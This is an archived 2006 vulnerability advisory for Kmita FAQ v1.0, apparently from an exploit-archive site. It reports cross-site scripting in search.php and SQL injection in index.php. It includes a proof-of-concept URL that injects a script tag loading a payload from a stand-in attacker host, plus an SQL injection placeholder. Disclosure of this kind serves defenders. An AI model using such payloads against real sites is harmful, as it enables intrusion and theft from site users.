KmitaFAQv1.0.txt

KmitaFAQv1.0.txt: Posted Jun 11, 2006; Authored by Luny; Kmita FAQ v1.0 suffers from XSS and SQL injection.; tags | advisory, sql injection; SHA-256 | 2ed382af22747187e2bc4a01d9a4d50ab541a5e7df12508a0290e7836a5974b6; Download | Favorite | View

KmitaFAQv1.0.txt

Kmita FAQ v1.0

Homepage:
http://www.kmita-faq.com

Effected files:
search.php
index.php

Search.php does not sanatize user input before dynamically genrating it.
Proof of concept:

http://www.example.com/search.php?q=<SCRIPT%20SRC=http://evilsite.com/xss.js></SCRIPT>

SQL Injection proof of concept:
http://www.example.com/index.php?catid=[SQL]

Top Authors In Last 30 Days

Red Hat 260 files
indoushka 124 files
Ubuntu 97 files
Gentoo 36 files
Debian 25 files
Jasper Nota 25 files
Willem Westerhof 19 files
Jim Blankendaal 11 files
Apple 9 files
Martijn Baalman 9 files

File Archives

Systems

AIX (429)
Apple (2,099)
BSD (377)
CentOS (58)
Cisco (1,927)
Debian (7,107)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,567)
HPUX (880)
iOS (378)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (50,887)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (489)
RedHat (16,614)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,775)
UNIX (9,439)
UnixWare (187)
Windows (6,676)
Other

KmitaFAQv1.0.txt

KmitaFAQv1.0.txt

File Archive:

August 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

KmitaFAQv1.0.txt

Share This

KmitaFAQv1.0.txt

File Archive:

August 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems